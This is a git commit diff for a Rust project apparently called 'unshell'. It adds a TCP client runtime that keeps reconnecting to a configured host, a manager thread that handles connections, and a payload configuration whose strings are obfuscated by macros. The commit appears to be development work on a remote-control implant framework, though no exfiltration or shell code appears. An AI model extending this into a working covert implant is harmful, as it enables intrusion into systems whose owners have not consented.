Work on manager connection system

This commit is contained in:
Michael Mikovsky
2025-11-25 15:22:14 -07:00
parent 1efa3206ae
commit 6863e08a0a
9 changed files with 181 additions and 77 deletions
+30 -27
View File
@@ -1,4 +1,7 @@
use std::collections::HashMap; use std::{
collections::HashMap,
io::{Write, stdin, stdout},
};
use static_init::dynamic; use static_init::dynamic;
use unshell_lib::{ use unshell_lib::{
@@ -41,39 +44,39 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
// Manager::st // Manager::st
Manager::join(manager); // Manager::join(manager);
// loop { loop {
// print!("> "); print!("> ");
// stdout().flush().expect("Failed to flush stdout"); stdout().flush().expect("Failed to flush stdout");
// let mut input = String::new(); let mut input = String::new();
// stdin().read_line(&mut input).expect("Failed to read line"); stdin().read_line(&mut input).expect("Failed to read line");
// let args = input.trim().split(" ").collect::<Vec<&str>>(); let args = input.trim().split(" ").collect::<Vec<&str>>();
// match args[0] { match args[0] {
// "" => {} "" => {}
// "test" => { "test" => {
// if let Some(arg) = args.get(1) { if let Some(arg) = args.get(1) {
// println!("Test with argument: {}", arg); println!("Test with argument: {}", arg);
// serverruntime // serverruntime
// .send(&Announcement::TestAnnouncement(arg.to_string())) // .send(&Announcement::TestAnnouncement(arg.to_string()))
// .unwrap(); // .unwrap();
// } else { } else {
// println!("Test without argument"); println!("Test without argument");
// } }
// } }
// _ => { _ => {
// println!("Invalid Command: '{}'", args[0]); println!("Invalid Command: '{}'", args[0]);
// } }
// } }
// // println!("{:?}", args); // println!("{:?}", args);
// } }
// serverruntime.send(&Announcement::GetRuntimes)?; // serverruntime.send(&Announcement::GetRuntimes)?;
// let response = serverruntime. // let response = serverruntime.
Ok(()) // Ok(())
} }
+46 -23
View File
@@ -6,6 +6,7 @@ use std::{
atomic::{AtomicBool, Ordering}, atomic::{AtomicBool, Ordering},
}, },
thread::{self, JoinHandle}, thread::{self, JoinHandle},
time::Duration,
}; };
use crate::{config::RuntimeConfig, *}; use crate::{config::RuntimeConfig, *};
@@ -32,35 +33,57 @@ impl ClientRuntime {
} }
}; };
let retry = match config.config.get("retry") {
Some(host) => Duration::from_millis(host.parse::<u64>().unwrap()),
None => {
return Err(ModuleError::Error(
"Could not find RETRY in Client Runtime".into(),
));
}
};
Ok(Self { Ok(Self {
thread_handle: thread::spawn(move || { thread_handle: thread::spawn(move || {
debug!("Connecting to server..."); debug!("Connecting to server...");
let mut stream = match TcpStream::connect(host) {
Ok(stream) => stream,
Err(e) => {
error!("Failed to connect to server: {}", e);
return;
}
};
info!("Connected");
while !join_clone.load(Ordering::Relaxed) { loop {
let mut size_buf = [0u8; 4]; let mut stream = match TcpStream::connect(host) {
stream.read_exact(&mut size_buf).unwrap(); Ok(stream) => stream,
let size = u32::from_be_bytes(size_buf); Err(e) => {
error!("Failed to connect to server: {}", e);
let mut buf = vec![0u8; size as usize]; thread::sleep(retry);
continue;
stream.read_exact(&mut buf).unwrap(); }
};
let a = Announcement::decode(&buf).unwrap(); info!("Connected");
match a { while !join_clone.load(Ordering::Relaxed) {
Announcement::TestAnnouncement(s) => { let mut size_buf = [0u8; 4];
println!("Received test announcement: {}", s) match stream.read_exact(&mut size_buf) {
Ok(()) => {}
Err(_) => {
break;
}
};
let size = u32::from_be_bytes(size_buf);
let mut buf = vec![0u8; size as usize];
stream.read_exact(&mut buf).unwrap();
let a = Announcement::decode(&buf).unwrap();
match a {
Announcement::TestAnnouncement(s) => {
println!("Received test announcement: {}", s)
}
_ => {}
} }
_ => {}
} }
debug!("Disconnected from {}", host);
thread::sleep(retry);
} }
}), }),
join_signal, join_signal,
+50 -20
View File
@@ -1,12 +1,13 @@
use std::{ use std::{
collections::HashMap, collections::HashMap,
sync::{Arc, Mutex}, sync::{Arc, Mutex},
thread, thread::{self, JoinHandle},
time::Duration, time::Duration,
}; };
use crate::{ use crate::{
config::{NamedComponent, PayloadConfig, RuntimeConfig}, config::{NamedComponent, PayloadConfig, RuntimeConfig},
network::Connection,
*, *,
}; };
use module::Module; use module::Module;
@@ -16,10 +17,14 @@ use unshell_obfuscate::symbol;
pub struct Manager { pub struct Manager {
id: &'static str, id: &'static str,
handle: Option<JoinHandle<()>>,
pub modules: Vec<Module>, pub modules: Vec<Module>,
active_runtimes: Vec<Box<dyn ModuleRuntime>>,
components: HashMap<String, NamedComponent>, components: HashMap<String, NamedComponent>,
active_runtimes: Vec<Box<dyn ModuleRuntime>>,
pub connections: Vec<Connection>,
} }
// static mut MANAGER_RUNTIME: Option<Arc<Mutex<Manager>>> = None; // static mut MANAGER_RUNTIME: Option<Arc<Mutex<Manager>>> = None;
@@ -28,16 +33,20 @@ impl Manager {
fn new(id: &'static str, components: Vec<NamedComponent>, modules: Vec<Module>) -> Self { fn new(id: &'static str, components: Vec<NamedComponent>, modules: Vec<Module>) -> Self {
Self { Self {
id, id,
handle: None,
modules, modules,
components: components components: components
.into_iter() .into_iter()
.map(|c| (c.name.to_string(), c)) .map(|c| (c.name.to_string(), c))
.collect(), .collect(),
active_runtimes: Vec::new(), active_runtimes: Vec::new(),
connections: Vec::new(),
} }
} }
/// Create Manager, and run initilization for each Module /// Create Manager, and run initialization for each Module
#[allow(static_mut_refs)] #[allow(static_mut_refs)]
pub fn start(config: &'static PayloadConfig, modules: Vec<Module>) -> Arc<Mutex<Self>> { pub fn start(config: &'static PayloadConfig, modules: Vec<Module>) -> Arc<Mutex<Self>> {
// Construct self // Construct self
@@ -56,6 +65,8 @@ impl Manager {
Self::start_runtime(this.clone(), runtime); Self::start_runtime(this.clone(), runtime);
} }
this.lock().unwrap().handle = Some(Self::start_thread(this.clone()));
this this
} }
@@ -85,28 +96,47 @@ impl Manager {
} }
} }
/// Iterateratively loop through all runtimes, until all are finished executing /// The manager thread. receives announcements, and kills runtimes.
fn start_thread(this: Arc<Mutex<Self>>) -> JoinHandle<()> {
thread::spawn(move || {
loop {
thread::sleep(Duration::from_millis(10));
let mut this_lock = this.lock().unwrap();
if this_lock.active_runtimes.len() <= 0 {
debug!("There are no more runtimes! Exiting...");
break;
}
this_lock.active_runtimes.retain(|runtime| {
if runtime.is_running() {
true
} else {
debug!("Runtime exited!"); //TODO: Make this better
false
}
});
// Read announcements
this_lock.recv_connection_announcements();
// Prune dead connections
this_lock.prune_connections();
drop(this_lock)
}
})
}
/// Wait for manager thread to finish.
pub fn join(this: Arc<Mutex<Self>>) { pub fn join(this: Arc<Mutex<Self>>) {
loop { loop {
let mut this_lock = this.lock().unwrap(); if this.lock().unwrap().handle.as_ref().unwrap().is_finished() {
if this_lock.active_runtimes.len() <= 0 {
debug!("There are no more runtimes! Exiting...");
break; break;
} }
this_lock.active_runtimes.retain(|runtime| { thread::sleep(Duration::from_millis(100));
if runtime.is_running() {
true
} else {
debug!("Runtime exited!"); //TODO: Make this better
false
}
});
drop(this_lock);
thread::sleep(Duration::from_millis(500));
} }
} }
@@ -0,0 +1,16 @@
use crate::{Announcement, module::Manager};
impl Manager {
pub fn recv_announcement(&mut self, announcement: &Announcement) {
match announcement {
Announcement::TestAnnouncement(str) => {
println!("Got test announcement: {}", str)
}
// Announcement::GetRuntimes => todo!(),
// Announcement::GetRuntimesAck(_) => todo!(),
// Announcement::StartRuntime(runtime_config) => todo!(),
// Announcement::StartRuntimeAck(_) => todo!(),
_ => {}
}
}
}
@@ -0,0 +1,29 @@
use crate::{
Announcement,
module::Manager,
network::{Connection, Stream},
};
impl Manager {
pub fn add_connection(&mut self, connection: Connection) {
self.connections.push(connection);
}
pub fn prune_connections(&mut self) {
self.connections.retain(|c| c.is_alive());
}
pub fn recv_connection_announcements(&mut self) {
// Collect all incoming announcements
let announcements = self
.connections
.iter()
.map(|c| c.read())
.flat_map(|array| array)
.collect::<Vec<Announcement>>();
for announcement in announcements {
self.recv_announcement(&announcement)
}
}
}
+3
View File
@@ -1,4 +1,7 @@
mod manager; mod manager;
mod manager_announcement;
mod manager_connection;
mod module; mod module;
mod proc_load; mod proc_load;
+2 -5
View File
@@ -43,11 +43,8 @@ impl Stream<Announcement> for Connection {
self.rx.len() self.rx.len()
} }
fn read(&mut self) -> Option<Announcement> { fn read(&self) -> Vec<Announcement> {
match self.rx.is_empty() { self.rx.try_iter().collect()
true => None,
false => self.rx.recv().ok(),
}
} }
fn write(&mut self, data: Announcement) -> Result<(), crate::ModuleError> { fn write(&mut self, data: Announcement) -> Result<(), crate::ModuleError> {
+1 -1
View File
@@ -10,7 +10,7 @@ pub trait Stream<T>: Send + Sync {
fn is_alive(&self) -> bool; fn is_alive(&self) -> bool;
fn len(&self) -> usize; fn len(&self) -> usize;
fn read(&mut self) -> Option<T>; fn read(&self) -> Vec<T>;
fn write(&mut self, data: T) -> Result<(), ModuleError>; fn write(&mut self, data: T) -> Result<(), ModuleError>;
+4 -1
View File
@@ -20,7 +20,10 @@ static PAYLOAD_CONFIG: PayloadConfig = PayloadConfig {
runtime_config: vec![RuntimeConfig { runtime_config: vec![RuntimeConfig {
parent_component: symbol!("client").to_string(), parent_component: symbol!("client").to_string(),
name: symbol!("client runtime").to_string(), name: symbol!("client runtime").to_string(),
config: HashMap::from([(symbol!("host").to_string(), obs!("localhost:1234"))]), config: HashMap::from([
(symbol!("host").to_string(), obs!("localhost:1234")),
(symbol!("retry").to_string(), obs!("1000")),
]),
}], }],
}; };